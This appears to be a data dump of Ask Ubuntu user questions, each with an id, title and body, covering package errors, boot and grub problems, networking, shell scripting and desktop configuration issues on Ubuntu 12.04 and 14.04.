( from ... /authbind_1.2.0build3_amd64.deb ) ... selecting previously unselected package icedtea-6-jre-cacao . unpacking icedtea-6-jre-cacao ( from ... /icedtea-6-jre-cacao_6b31-1.13.3-1ubuntu1~0.12.04.2_amd64.deb ) ... selecting previously unselected package icedtea-6-jre-jamvm . unpacking icedtea-6-jre-jamvm ( from ... /icedtea-6-jre-jamvm_6b31-1.13.3-1ubuntu1~0.12.04.2_amd64.deb ) ... processing triggers for ureadahead ... ureadahead will be reprofiled on next reboot processing triggers for man-db ... errors were encountered while processing : /var/cache/apt/archives/tomcat7-common_7.0.26-1ubuntu1.2_all.deb e : sub-process /usr/bin/dpkg returned an error code ( 1 ) any ideas ? update : vagrant @ precise64 : ~ $ ls -l /usr/share/tomcat7/bin/daemon.sh -rwxrwxrwx 1 vagrant vagrant 7476 feb 25 2012 /usr/share/tomcat7/bin/daemon.sh vagrant @ precise64 : ~ $ dpkg -s /usr/share/tomcat7/bin/daemon.sh dpkg-query : no path found matching pattern /usr/share/tomcat7/bin/daemon.sh . well that seemed weird tried some others . vagrant @ precise64 : ~ $ dpkg -s /usr/share/tomcat7/ libtomcat7-java , tomcat7 : /usr/share/tomcat7 vagrant @ precise64 : ~ $ dpkg -s /usr/share/tomcat7/bin dpkg-query : no path found matching pattern /usr/share/tomcat7/bin . vagrant @ precise64 : /usr/share/tomcat7/bin $ ls bootstrap.jar catalina-tasks.xml daemon.sh setclasspath.sh shutdown.sh tomcat-juli.jar version.sh catalina.sh configtest.sh digest.sh setenv.sh startup.sh tool-wrapper.sh this is a vagrant machine using the vanilla precise64 box . nothing special about it . in fact , the same config worked yesterday ...
493749	prevent parameter expansion in shell script	folks , i often have to do a recursive search in files . tired of typing the whole `` find/grep '' combination all the time , i just created a script with the following line : find . -name $ 1 -exec grep $ 2 { } + 2 > /dev/null the idea is that i should be able to run it as , for example : myfind '* ' hello the problem is , when '* ' gets passed into the script , the script is expanding it to each file in the directory . i tried putting a quote around $ 1 : find . -name ' $ 1 ' -exec grep $ 2 { } + 2 > /dev/null however , this turns $ 1 into a literal string . would appreciate your help in finding the right syntax . must be something simple that i am missing . regards , peter
493753	diagonal switching to the top-left workspace does n't work	description of the ( original ) issue when i 'm in the bottom-right workspace , pressing ctrl+alt+up+left is supposed to take me to the top-left workspace - but it is impossible to switch to the top-left workspace by pressing more than one arrow at the same time . diagonal switching to other three workspaces ( with simultaneous keypressing ) does work . for me to switch to the top-left workspace i have to literally use one arrow to move in one direction , then let it go , and then press the other arrow ( all the while still holding ctrl+alt ) . for example , starting from the bottom-right workspace : press ctrl+alt+up+left together simultaneously - > nothing happens let go of up , left while still holding ctrl+alt - > switch to bottom-left workspace press up while still holding ctrl+alt+left - > nothing happens let go of left , press up , while still holding ctrl+alt - > switches to the top-left workspace ubuntu version 14.04 . it works on a laptop with 14.04 however . updates update 1 : i have just tried diagonal switching on the livecd - and it still does n't work . i tried the same livecd on my laptop - and it does . this strongly suggests that it 's not really a software issue - but i 'm still not sure , and definitely need help figuring this out , because it 's very annoying . update 2 : after installing screenkey , i have noticed that the key combination of ctrl+alt+up+left is not even registered . here is what it looks like when i switch to the bottom-right workspace from the top-left one diagonally : and when switching to the top-left one from the bottom-right one diagonally - nothing happens , and screenkey does n't show any keys being pressed . i 'm still investigating to find out whether this is a hardware issue - but all the individual keys ( ctrl , alt , up arrow , left arrow ) are registered correctly . update 3 : it works when i use a wireless logitech keyboard . update 4 : i ran showkey in one of the consoles , and this is what it looks like when i 'm pressing the key combinations using the usb keyboard : switching to bottom-right workspace : keycode 29 press ctrl keycode 56 press alt keycode 106 press right keycode 108 press down keycode 106 release right keycode 108 release down keycode 29 release ctrl keycode 56 release alt switching to top-left workspace : keycode 29 press ctrl keycode 56 press alt keycode 29 release ctrl keycode 56 release alt notice the missing arrow key notifications .
493756	toolchain binaries can not be found	trying to build recent version of u-boot bootloader for my mini2440 arm board i managed to download a toolchain package from codesourcery and extract it to following path : /usr/local/arm-2008q3/ i also exported following values for current session : export path= $ path : /usr/local/arm-2008q3/bin export cross_compile=arm-none-linux-gnueabi- when i run make i get a following output and i cant figure out why : make : arm-none-linux-gnueabi-gcc : command not found for dir in tools examples api_examples ; do make -c $ dir _depend ; done make [ 1 ] : arm-none-linux-gnueabi-gcc : command not found make [ 1 ] : entering directory `/home/deth/uboot/mini2440/tools' make [ 1 ] : nothing to be done for `_depend ' . make [ 1 ] : leaving directory `/home/deth/uboot/mini2440/tools' make [ 1 ] : arm-none-linux-gnueabi-gcc : command not found make [ 1 ] : entering directory `/home/deth/uboot/mini2440/examples' /bin/sh : 1 : arm-none-linux-gnueabi-gcc : not found i double checked everything and binaries indeed reside in mentioned folder but ... please explain where i 'm wrong .
493762	i ca n't connect to localhost from other computers	i can see the web pages i created in /var/www/html/ by typing localhost in url bar . a few months ago i could even access those pages by typing my ip address from other computers , but now i am getting server timed out when i type my ip address from my mobile phone ; my friends are also not able to connect by typing my ip address . recently i installed webmin from a tutorial in unixmen , i thought maybe it changed read and execute permissions . so i executed the command chmod -r 775 , but it did n't change anything ( still not able to connect from other computers ) . everything is working fine from host computer . the output of ifconfig is : eth0 link encap : ethernet hwaddr 08:9e:01:00:10 : ad inet addr:183.83.83.29 bcast:183.83.127.255 mask:255.255.192.0 inet6 addr : fe80 : :a9e:1ff : fe00:10ad/64 scope : link up broadcast running multicast mtu:1500 metric:1 rx packets:443584 errors:0 dropped:0 overruns:0 frame:0 tx packets:378897 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:470991396 ( 470.9 mb ) tx bytes:96527317 ( 96.5 mb ) lo link encap : local loopback inet addr:127.0.0.1 mask:255.0.0.0 inet6 addr : : :1/128 scope : host up loopback running mtu:65536 metric:1 rx packets:154813 errors:0 dropped:0 overruns:0 frame:0 tx packets:154813 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 rx bytes:20729684 ( 20.7 mb ) tx bytes:20729684 ( 20.7 mb ) pan1 link encap : ethernet hwaddr 42 : dd:4f : ed : a2 : f2 inet addr:10.141.41.1 bcast:10.141.41.255 mask:255.255.255.0 inet6 addr : fe80 : :40dd:4fff : feed : a2f2/64 scope : link up broadcast running multicast mtu:1500 metric:1 rx packets:0 errors:0 dropped:0 overruns:0 frame:0 tx packets:174 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 rx bytes:0 ( 0.0 b ) tx bytes:32909 ( 32.9 kb )
493763	how to install unity desktop over gnome ?	i installed ubuntu gnome because i did n't want unity but now i want the option to switch between unity and gnome . how do i get unity working ?
493768	did my ubuntu deleted the windows partition ?	when i installed ubuntu 14.04 , i chose the `` something else '' option and did create a new partition . but now , i seem to only have the ubuntu as bootable . my pc only said there was 1 partition on the hard drive . update :
493772	problem configuring how a launch bar application starts	i 've installed google chromium under goobuntu 12.04 . the application works fine , but i want it to start in 'incognito ' mode by default . i 've found instructions for how to initiate this using a command line statement , but i do n't want to have to start the brower in command line every time - i just want to click on the icon from the launchbar and have it start in incognito mode . i am new to linux and know nothing about how to edit the properties or preferences for the icon ( in windows parlance ) . i assume there is a way to configure the application so that when i click on it 's icon , it will start in the mode i want .
493773	no unity launcher and top status bar showing in ubuntu after re-installing	i removed everything of unity and ubuntu desktop and installed lubuntu . but now i want to go back to ubuntu ( unity ) and i re-installed unity but when i login into then it does n't show unity launcher and top status bar . did i miss anything while re-installing ? how to get unity back ?
493774	grub rescue without cd : error	i deleted 2 partitions on my hard disk and now i am unable to boot my pc . i searched and found that it is possible to boot without a cd , but the method is not working for me because i ca n't find the partition with the /boot directory.each -ls ( hd0 , x ) command says unknown file system . ( x=1,2,3 ) please help.i am stuck for 7 hours now . the method i was using is : ls ( hd0 ) ( hd0 , msdos3 ) ( hd0 , msdos2 ) ( hd0 , msdos1 ) // tried to locate /boot after this set prefix= ( hd0 , x ) /boot/grub set root= ( hd0 , x ) set ls /boot -- - > says unknown filesystem in every case for each x value -- rest steps abandoned
493775	raise window on mouse up event instead of click event in ubuntu	main problem is drag and drop from a maximize windows to another window ( not maximized ) . i have a maximized nautilus window and i want to drag and drop a file into skype window . but as soon as i click on file , skype will hide under nautilus window . also drag file on unity launcher does't work in ubuntu 14.04 , specially when there are multiple window ( for one launcher icon ) . we can simulate this by disable the option `` raise on click '' in compiz settings . but this option also create problem to raise the window . i think if we can configure that `` raise window on mouse up ( left button ) event '' then drag and drop problem can be solve . i googled for a long time but no luck . i am almost sure , there is no option to do this . i also did n't find any hints to do this . i am a developer , i can code . i need to know the point where to start . can someone help me to find the way ? thanks in advance .
493779	no sound and no volume indicator in lxpanel	i 'm on a fresh install of lubuntu 14.04 64bit and i already got the network indicator back using this guide : http : //www.webupd8.org/2014/04/fix-lubuntu-1404-network-manager.html i have no sound . the volume indicator is also not showing even though it 's listed under panel preferences . how do i get sound and how do i get the indicator to show ?
493783	after reboot , my ubuntu 'freezes ' at the purple ground , without any menu icon , just movable mouse	i just rebooted my computer with ubuntu14.04 than the login prompt shows , with a very-low resolution , which is not the same as before reboot . then logged in , but nothing happens , just leaving me with a blank purple background , with my mouse , not totally freezed . i can still using ctrl+alt+f2 to enter into the shell . i have tried to purge nvidia , reinstall unity , but still did n't work
493794	ubuntu system servtices issues	in ubuntu 14.04 i am not seeing the option for system services running in the system.how do i open system- > administrator- > services in ubuntu 14.04 .
493801	can not reach bitbucket.org from browser	i can not load bitbucket.org in the browser ( both ff and chrome ) .when i ping i get the right answer : ping bitbucket.org ( 131.103.20.167 ) 56 ( 84 ) bytes of data . 64 bytes from 131.103.20.167 : icmp_seq=1 ttl=42 time=246 ms 64 bytes from 131.103.20.167 : icmp_seq=2 ttl=42 time=246 ms 64 bytes from 131.103.20.167 : icmp_seq=3 ttl=42 time=247 ms 64 bytes from 131.103.20.167 : icmp_seq=4 ttl=42 time=247 ms 64 bytes from 131.103.20.167 : icmp_seq=5 ttl=42 time=245 ms 64 bytes from 131.103.20.167 : icmp_seq=6 ttl=42 time=245 ms ^c -- - bitbucket.org ping statistics -- - 6 packets transmitted , 6 received , 0 % packet loss , time 5006ms rtt min/avg/max/mdev = 245.067/246.473/247.486/1.009 ms if i enter the ip address the site is loaded but i ca n't login because of the csrf protection thing . i set the dns in /etc/resolv.conf both to google 8.8.8.8 and open dns but the result is the same what should i do ?
493802	unable to install ubuntu touch on my nexus 7 32gb	i bought a nexus 7 tablet 32gb ( flo ) and found the information to install ubuntu-touch here : http : //developer.ubuntu.com/start/ubuntu-for-devices/installing-ubuntu-for-devices/ i installed both phablet-tools and ubuntu-device-flash , my device gets correctly recognized in both adb and fastboot : user @ ***** : ~ $ adb devices list of devices attached 0498b5** device user @ ***** : ~ $ adb reboot bootloader user @ ***** : ~ $ fastboot devices 0498b5** fastboot this is the status reported by the bootloader after the unlock : product name - flo variant - flo 32g hw version - rev_e bootloader version - flo-04.02 lock state - unlocked i 'm trying to install the stable release with the command ubuntu-device-flash -- channel=stable -- bootstrap ( as user ) and this is what i get in my terminal : user @ ***** : ~ $ ubuntu-device-flash -- channel=stable -- bootstrap 2014/07/09 21:02:00 expecting the device to be in the bootloader ... waiting 2014/07/09 21:02:00 device is |flo| 2014/07/09 21:02:01 flashing version 1 from stable channel and server +++++ to device flo 2014/07/09 21:02:01 ubuntu-touch/stable is a channel alias to stable 45.05 mb / 45.05 mb [ ========================================================================================================================================================================= ] 100.00 % 3.02 mb/s 330.50 mb / 330.50 mb [ ======================================================================================================================================================================= ] 100.00 % 5.20 mb/s /home/user/.cache/ubuntuimages/ubuntu-touch/stable/flo/version-1.tar.xz /home/user/.cache/ubuntuimages/gpg/image-master.tar.xz /home/user/.cache/ubuntuimages/gpg/image-signing.tar.xz /home/user/.cache/ubuntuimages/pool/device- 771577bbf9ec25e5be7e513dd9e3e9b249a4fdb2664aef068c438fccb32cafbf.tar.xz 2014/07/09 21:03:21 start pushing /home/user/.cache/ubuntuimages/ubuntu- touch/stable/flo/version-1.tar.xz to device 2014/07/09 21:03:21 start pushing /home/user/.cache/ubuntuimages/gpg/image-master.tar.xz to device 2014/07/09 21:03:21 start pushing /home/user/.cache/ubuntuimages/gpg/image-signing.tar.xz to device 2014/07/09 21:03:21 start pushing /home/user/.cache/ubuntuimages/pool/device- 771577bbf9ec25e5be7e513dd9e3e9b249a4fdb2664aef068c438fccb32cafbf.tar.xz to device 2014/07/09 21:03:21 start pushing /home/user/.cache/ubuntuimages/pool/ubuntu- 4cecf3052ae3d517869ca2ac632e7d49dfb0ef0b56cd6167754528dffbb9f5d7.tar.xz to device 2014/07/09 21:03:21 done pushing /home/user/.cache/ubuntuimages/ubuntu- touch/stable/flo/version-1.tar.xz to device 2014/07/09 21:03:21 done pushing /home/user/.cache/ubuntuimages/gpg/image-master.tar.xz to device 2014/07/09 21:03:21 done pushing /home/user/.cache/ubuntuimages/gpg/image-signing.tar.xz to device 2014/07/09 21:03:33 done pushing /home/user/.cache/ubuntuimages/pool/device- 771577bbf9ec25e5be7e513dd9e3e9b249a4fdb2664aef068c438fccb32cafbf.tar.xz to device 2014/07/09 21:04:17 done pushing /home/user/.cache/ubuntuimages/pool/ubuntu- 4cecf3052ae3d517869ca2ac632e7d49dfb0ef0b56cd6167754528dffbb9f5d7.tar.xz to device 2014/07/09 21:04:17 created ubuntu_command : /home/user/.cache/ubuntuimages/ubuntu_commands937086177 2014/07/09 21:04:17 rebooting into recovery to flash at this point my tablet ( that was into the ubuntu cwm-based recovery ) reboots as expected but never gets into recovery , it wants to reboot normally and this gets stuck on a bootloop whith the ubuntu logo and the loading bar underneath . the next step , reached this point , that i tried is the following : assigning execution permission to the script file : user @ ***** : ~ $ chmod +x /home/user/.cache/ubuntuimages/ubuntu_commands937086177 rebooted the tablet manually into recovery and launched the command to run the script left behing by before : user @ ***** : ~ $ ubuntu-device-flash -- run-script=/home/user/.cache/ubuntuimages/ubuntu_commands937086177 2014/07/09 21:10:02 expecting the device to expose an adb interface ... 2014/07/09 21:10:02 device is |flo| 2014/07/09 21:10:02 flashing version 1 from ubuntu-touch/stable channel and server https : //system-image.ubuntu.com to device flo 2014/07/09 21:10:02 ubuntu-touch/stable is a channel alias to ubuntu-touch/stable 2014/07/09 21:10:08 start pushing /home/user/.cache/ubuntuimages/ubuntu- touch/stable/flo/version-1.tar.xz to device 2014/07/09 21:10:08 start pushing /home/user/.cache/ubuntuimages/pool/device- 771577bbf9ec25e5be7e513dd9e3e9b249a4fdb2664aef068c438fccb32cafbf.tar.xz to device 2014/07/09 21:10:08 start pushing /home/user/.cache/ubuntuimages/pool/ubuntu- 4cecf3052ae3d517869ca2ac632e7d49dfb0ef0b56cd6167754528dffbb9f5d7.tar.xz to device 2014/07/09 21:10:08 start pushing /home/user/.cache/ubuntuimages/gpg/image-master.tar.xz to device 2014/07/09 21:10:08 start pushing /home/user/.cache/ubuntuimages/gpg/image-signing.tar.xz to device 2014/07/09 21:10:08 done pushing /home/user/.cache/ubuntuimages/ubuntu- touch/stable/flo/version-1.tar.xz to device 2014/07/09 21:10:08 done pushing /home/user/.cache/ubuntuimages/gpg/image-master.tar.xz to device 2014/07/09 21:10:08 done pushing /home/user/.cache/ubuntuimages/gpg/image-signing.tar.xz to device 2014/07/09 21:10:20 done pushing /home/user/.cache/ubuntuimages/pool/device- 771577bbf9ec25e5be7e513dd9e3e9b249a4fdb2664aef068c438fccb32cafbf.tar.xz to device 2014/07/09 21:11:03 done pushing /home/user/.cache/ubuntuimages/pool/ubuntu- 4cecf3052ae3d517869ca2ac632e7d49dfb0ef0b56cd6167754528dffbb9f5d7.tar.xz to device 2014/07/09 21:11:03 created ubuntu_command : /home/user/.cache/ubuntuimages/ubuntu_commands420201674 2014/07/09 21:11:03 preparing to run /home/user/.cache/ubuntuimages/ubuntu_commands937086177 to finish the flashing process 2014/07/09 21:11:03 fork/exec /home/user/.cache/ubuntuimages/ubuntu_commands937086177 : exec format error anybody can possibly help me getting this done ? i do n't reallu mind getting 13.x or 14.x on it as long as i can try it , really . on my laptop , which is the machine i 'm using to flash , i am running ubuntu saucy x86_64 and i 'm afraid that my problem is due to the x86_64 architecture but i did n't find any information on internet about that ...
493807	fan not working on acer 5315 ubuntu 14.04	i downloaded ubuntu 14.04 on my old acer 5315 but it keeps shutting down after like 20mns because of the fan but when i switched back to windows it works perfectly . i was considering to upgrade the bios but it seems a little bit risky . can somebody tell me an alternative way to fix this problem ? thanks .
493809	kubuntu shutdown issue	after installing kubuntu14.04 on my gateway-m675 laptop , it will not restart or shut down . it boots up and runs fine , but after updates or installs , it will not restart . it closes all programs and services , but leaves a totally black screen and never goes any further without a manual restart . any solutions or should i reinstall to see if it happens again ?
493810	ubuntu high-dpi issue : blurry backgrounds	it is a minor bug , but all wallpapers are a bit blurry . at the login prompt they are nice and crisp , but once logged in , they all get this soft scaled look . is this a known bug ? i could not find anyone with the same issue . hoping that someone knows a workaround . i am running ubuntu 14.04 on a macbook pro retina ( high dpi model ) with intel graphics drivers . and yes , the wall-papers that i am using are at least as large or larger than my screens resolution . images showing the issue are attached : better resolution worse resolution
493811	prevent package manager recreating files in /etc/fonts/conf.d/	i use a bitmap font for my terminal windows . in order for this to work , i need to enable bitmap fonts . in /etc/fonts/conf.d/ there 's a symlink called 70-no-bitmaps.conf to the matching configuration file in /etc/fonts/conf.avail/ . i delete this symlink and create one for the matching 80-yes-bitmaps.conf . this works . ( i also have the following in my ~/.fonts/fonts.conf file to suppress the hideous bitmap fonts that claim to be helvetica and mess up web-pages : < rejectfont > < glob > /usr/share/fonts/x11/* < /glob > < /rejectfont > this is fine for me because i only really use a single bitmap font lives in my home directory anyway . ) unfortunately , every month or two , the package manager recreates the symlink , and when i have both files the no one takes precedence and disables bitmap fonts . what is the correct way to fix this so that it wo n't break again every time the package updates ? i could replace the symlink with a dummy empty file , but this seems nasty and will leave the directory looking confusing - with both yes-bitmaps and no-bitmaps files , it wo n't be clear which is in effect until you look inside the files . is there a better way to fix it ?
493812	is my cpu-temperature ok ?	i just brought my laptop to a service-center to get it cleaned . now under normal use ( using apt-get , watching videos , web-browsing ... ) my cpu-temp is between 55-70째c . if i put it under stress with 4xburnp6 it goes up to 90-95째c after 5-10 minutes and seems to stay there . ( idle temperature is about 44-48째c ) so i 'm curios , can this temperatures considered as normal or save ? ( btw i 'm using a thinkpad t420s with cooling-pad )
493813	sftp server unreachable	i have an sftp server i set up on ubuntu . however , when i attempt to access it from centos on virtualbox , i keep getting this : connecting to 192.168.xxx.xxxx ... . ssh : can not connect to host 192.168.xxxx.xxxx port 22 : network is unreachable could n't read packet : connection reset by peer when i run a netstat -an | grep `` listen `` , this is what i get for a result : tcp 0 0 127.0.1.1:53 0.0.0.0 : * listen tcp 0 0 0.0.0.0:21 0.0.0.0 : * listen tcp 0 0 0.0.0.0:22 0.0.0.0 : * listen tcp 0 0 127.0.0.1:631 0.0.0.0 : * listen tcp6 0 0 : ::22 : : : * listen tcp6 0 0 : :1:631 : : : * listen when i attempt to ping on centos , i get : connect : network is unreachable so port 22 is already open but i still ca n't sftp into my server . does anyone have any suggestions how i can make port 22 reachable for centos ? update : i was able to configure my ip on centos . but i still ca n't access it , everytime i plug in the password , it keeps saying permission denied , please try again . this is just an sftp server , but after 3 times of me entering the correct password i get : permission denied ( publickey , gssapi-keyex , gsappi-with-mic , password ) . it does not need a public key..
493815	removal of the lock/switch account menu in gnome desktop ubuntu 14.04 lts	we are looking for a way to remove the list of previously logged on users from the shutdown menu in ubuntu 14.04 lts running gnome classic desktop . we have lots of computers in a lab environment where we do not want other users to know login names of previous users that have used that particular machine . any help on removing this list would be appreciated . note , this is after a user logs into ubuntu 14.04 lts and when you click on the little gear icon in the upper right-hand corner to shutdown|logout|suspend|restart it also displays lock/switch account along with a list of user names . thank you !
493817	how to generate boot failure ?	i am testing dual-boot system and want to generate a boot failure when boot into one of the systems ( both are linux ) , basically to test grub-reboot function . my question is how to easily modify some files to cause boot failure ( should be easily recoverable ) ? thanks .
493824	remembering window positions ( and preferrably sizes , too ) in ubuntu 14.04	i 've just installed ubuntu 14.04 alongside windows and i am finding one thing to be very irritating . that is , when i open any application , it opens at the top-left of the screen . the first thing i have to do for every application opened is to move it to the center of the screen ( or wherever i want it to be ) . then later on i 'll close the app . but next time around , it 's back at the top-left of the screen again ! i have read related questions on askubuntu and across the web . however i was wondering , since those questions were asked with regards to ubuntu 12.04 , if there was a better solution to this problem for 14.04 users ? should n't something like this be in settings ? i mean , that 's just common sense really . is n't it ? i really do n't know anymore .
493826	grub rescue problem after deleting ubuntu partition !	after i deleted ubuntu partition , i rebooted my computer and got grub rescue problem . what i have tried so far is finding the right partition of ubuntu from grub rescue command by ls command . it lists ( hd0 ) ( hd0 , msdos5 ) ( hd0 , msdos3 ) ( hd0 , msdos2 ) ( hd0 , msdos1 ) ( hd1 ) ( hd1 , msdos1 ) then check them one by one : ls ( hd0 , msdos5 ) / ls ( hd0 , msdos1 ) / but i can not find the right partition . i will appreciate any advice of you guys on help me to solve this .
493827	need to know how to program laptop to connect to tv to laptop using hdmi cable or vga cable	i am trying to program my laptop and tv so i can watch my laptop on my tv using a hdmi and vga caable .i also have a s video cable.please help me to hook it up proper.i also need to program them both .
493829	ubuntu complains that i am not `` owner '' when copying files to certain folders	i am trying to copy a folder into the user/share/themes folder on ubuntu 14.04 , and it 's telling me i can not do this because i am not `` owner '' . so i right-clicked the usr/share/themes folder > properties > permissions tab and tried to change the permissions but they 're all greyed-out/disabled . so then i opened up terminal , entered groupmod tab tab tab > sudo adduser jase root to try and get higher permissions or something - and it worked . i verified that i added myself as root by id jase . but that still did n't fix the problem . i still ca n't copy folders or files to usr/share/themes folder . how can i do this ? how do i become `` owner '' ?
493830	install ubuntu 14.04 with windows 8.1	i have a sony vaio svs13a1s9es . i installed windows 8.1 in my computer and now i 've installed ubuntu 14.04 and i 've installed grub in sda6 , which is my `` / '' partition . the problem is that when i boot , i directly boot with windows and i 'm not asked if i want to boot with ubuntu . i 've tried the following things : - boot-repair gets an error : http : //paste.ubuntu.com/7772352/ - i ca n't disable windows secure boot because the option does n't appear in my bios menu . ( i guess i just do n't have secure boot ) - if i press f10 when the computer is booting , i get the following message : `` operative system not found '' at the moment i 'm using a supergrub2 disk cd to boot with windows or ubuntu but i would n't like to carry the cd everywhere to change between both operative systems . i ca n't find other solutions that 's why i asked here .
493833	how to turn off/modify ubuntu 's eq ?	i 'm a fairly new ubuntu user , and whilst listening to music ( using new/tested headphones ) throughout the entire system , i 've realized that the whole system 's `` eq '' sounds horrid when it comes to treble and bass . i 've no idea where to find ubuntu 's `` eq '' of sorts , but i 'd essentially just like to turn it off , so i can use a plugin equalizer .
493834	workspace focus problems	i 've been having a problem on my desktop system since 14.04 ( or how i 've started working ) with focus on the workspace . i 'm an avid updater , so i 'm usually current in my distributions . i generally have firefox maximized , thunderbird vertically maximized and various gnome-terminals at 80x25 . i can open a compose in thunderbird , start typing and lose focus without me doing anything ( this is a pain as it does funny things to the emails in the main thunderbird window ) . there appears no way through clicking , changing workspaces or keystroke to get the focus back to the compose window . i can open a new compose windows and the focus will work properly . if i reduce the size of the main thunderbird window and make sure that it 's not touching the edge and the compose window is not touching the edge , i do n't lose focus . if i open a second browser window , i can lose focus on one of them and have to close one of them down to get the focus back . i have n't actually noticed it happening with non-mozilla apps though . i 'm pretty sure this is a workspace issue . since there 's not an easy way to disable that in unity , i ca n't test it . should i report this as bug ?
493838	when trying ubuntu on win xp , i get the main screen but mouse and keyboard stop working , both are ps2	created a bootable usb . booted and chose `` try ubuntu '' . i get main screen , but ps2 mouse and keyboard do n't work . using the amd64 release of 14.04 . machine is hp pavilion a1520n with amd athlon 64x2 3800+ processor .
493842	can only write 0 byte files to directory ( 777 ) from linux	i find this very confusing ; i have a shared ( smb ) folder on a ubuntu machine . out of frustration i set the permissions to 777 , but still can not write to the directory from another linuxpc , other than the file is created as 0 bytes and by its name . then i get an error about insufficient permissions . is there another level above 777 ? however , accessing the directory from a windows pc on the network poses no problem .
493844	ubuntu installation not displaying full hdd	i am not sure how to best word my question , but i 'll try my hardest . when going to install ubuntu 14.04 ( alongside windows 8 ) , when i get to the part where it asks me to set the amount of space for each os , the installer only shows the windows recovery portion which is only ~6gb , instead of my full 500gb to split between the two . anyone know what problem i am having ? i have already tried doing a full shutdown instead of the hybrid from windows . as well as i have tried the installation from both usb and cd .
493845	ethernet not working on ubuntu 12.04	i 've installed ubuntu 12.04 on my laptop & when i plug-in the ethernet cable , it says `` disconnected '' please advise on me this pc info : hp pavilion ze4600 previously- windows xp pro now- ubuntu 12.04
493847	wireless not reconnecting after router reboot	i have 14.04 running headless for a media server . it 's running the ath9k module . when the server boots it connects and runs perfectly until i have to reboot my router . then it wo n't reconnect until i reboot the server . the wired card is still active but not plugged in . the wireless card is a tp-link tl-wdn4800 . any help would be appreciated .
493848	read/if command help	i 'm trying to run this- # ! /bin/bash echo `` who are you ? '' read names { if [ `` $ names '' == `` mallory '' ] ; echo `` hello , me ! '' else [ `` $ names '' == `` palmer '' ] ; echo `` hey , baby ! i love you ! '' else echo `` gtfo here ... '' } but every time i do , this happens ... mallory @ whitecelica : ~/stuff/learning/internets $ ./wru who are you ? mallory ./wru : line 9 : syntax error near unexpected token `else' ./wru : line 9 : `else [ `` $ names '' == `` palmer '' ] ; ' what am i doing wrong ?
493851	cant find hard drive in ubuntu	so my computer already has windows installed on a 1 tb hard drive and just purchased a 120 gb ssd that i believe is correctly installed . last night i set the bios to automatically start to the ssd and i chose the option to install ubuntu alongside windows . i intended for ubuntu to solely be on the ssd and windows to only be on the hard drive . i am fairly certain that ubuntu was properly installed on the ssd , however , for whatever reason i ca n't find it when i am using ubuntu , i can only find the hard drive . how do i find this ssd where ubuntu is supposed to be installed ? images from gparted :
493857	are re-combined btrfs incrementals identical to the original ?	i have several systems running btrfs , and i 'd like to use the btrfs subvolume send/receive features as a backup solution . i want to send daily incrementals to remote as efficiently as possible . that means i want to avoid sending changes in a daily incremental and later sending the same changes in a monthly incremental . specifically , i want to generate nightly incrementals as such : btrfs subvolume snapshot /home /backup/volume-date-daily btrfs send -p /backup/volume-previous-daily -f daily-date /backup/volume-date-daily push daily-date to remote after a while i 'd like to combine daily incrementals into monthly incrementals without re-sending all that data from the client . if i unpack all the incrementals ( btrfs receive ) , then remove all the intermediate subvolumes i do n't want , is the remaining subvolume sufficient for me to unpack all future daily incrementals generated by the client ? for example , the server has dailies 1-30 from the client . i unpack them and erase all subvolumes but daily 30 . when i receive daily 31 from the client , can i unpack that using btrfs receive ?
493858	ubuntu 12.04 failed login	after rebooting ubuntu 12.04 on an hp compaq 6530b , it can not login . the password registers as correct , then i am redirected to the login screen . gnome , and the guest account , and safe graphics mode also do not work . luckilly , the root terminal in grub does work . i have seen similar questions , that say to remove .xauthority , or replace lightdm , but those did nothing . does anyone have any insight to help me through this ?
493860	installing ubuntu on 700mhz power pc g3 snow i mac -w dvd	i have tried installing several ubuntu install versions with no success , using info found here . i have tried : lubuntu-14.04 ubuntu-12.04.4-desktop-amd64+mac 12.04 alternate 12.04-alternate-powerpc intallation runs , but after ubuntu startup screen- black . tried understanding the video card info- over my head . frustrated ! not one of the damn pcs i 've upgraded has given me this much trouble . suggestions for a novice at command line ? ( it was running os9 before i started this project . ) kk
493861	error messages upon installation of new ubuntu 14	1 ) i have a link to ubuntu ( for previous version ) on the boot menu . however when i click on that link i get a black screen ( no writing ) . my guess is that ubuntu crashed and disappeared , since i can not find it when i boot to windows 8.1 . 2a ) with the dvd in the correct drive i shut down computer with windows 8.1 2b ) i start with choosing cd/dvd drive 2c ) a black screen with lots of error message with consecutive numbers appear . i do n't seemed to be able to get rid of that . i had no problems with a previous version of ubuntu , which as mentioned has disappeared . any ideas ? thanks gabriele
493862	netcat not working ( at least , not that i can tell )	last night , i discovered that netcat , was behaving ... well , oddly , to say the least . when invoked ( i did n't use flags , just the basic `` netcat [ hostname ] [ port number ] ) , it would do one of two things depending on what was using it . that is , it behaved slightly differently if i ran a bash script that uses netcat , as opposed to using it on the command line . the script , which also used echo to supply a head request on port 80 , would prompt for user input as normal . immediately after pressing enter , though , the script would instantly end and return me to the command line . on the command line , though , invoking netcat with a hostname and port number would start a new line with no command line . after a few seconds , it would go to the next line and i 'd get the command line back . long story short , i tried to fix it by using sudo to remove the netcat files from /bin/ ( in hindsight , i 'm not sure why i thought that 'd help ) before immediately realizing that i had screwed up and never once backed up , so i reinstalled the vm , which returned netcat to working order . at least , until just now , because it 's doing the same thing again . is there something i can do to troubleshoot this ? edit : i did n't realize that i 'm still running 13.04 , which could ( i hope ) have something to do with netcat not working . once i have version 14.04 running , i 'll see if netcat works again and then edit the question again to share the results . if it works , i will also wait for one or two days to see if the issue reappears . if it does n't , i 'll add an answer . edit : now i 'm very confused . netcat was still behaving the same way after i updated to 14.04 . worse still , the problem was n't fixed , even temporarily , by reinstalling 14.04 through an .iso . if anybody can help me fix this , i 'd be extremely grateful .
493863	ubuntu homescreen	hey i was wondering if it 's possible to have a lock screen ( for when the computer is on the place to type in a password ) and a different homescreen ? ( ( like on the iphone/ipad ) ) thank 's , tyler running : toshiba 2010 laptop running ubuntu 14.04 32bit
493864	32-bit os on a 64 bit processor	i have a laptop with a 64-bit processor , but by accident i installed the 32-bit version of ubuntu 14.04. i can always back my data up , and re-install ubuntu , but i want to know if using 32-bit will be slower on a 64-bit processor , than a 64-bit os on a 64-bit processor . thanks guys
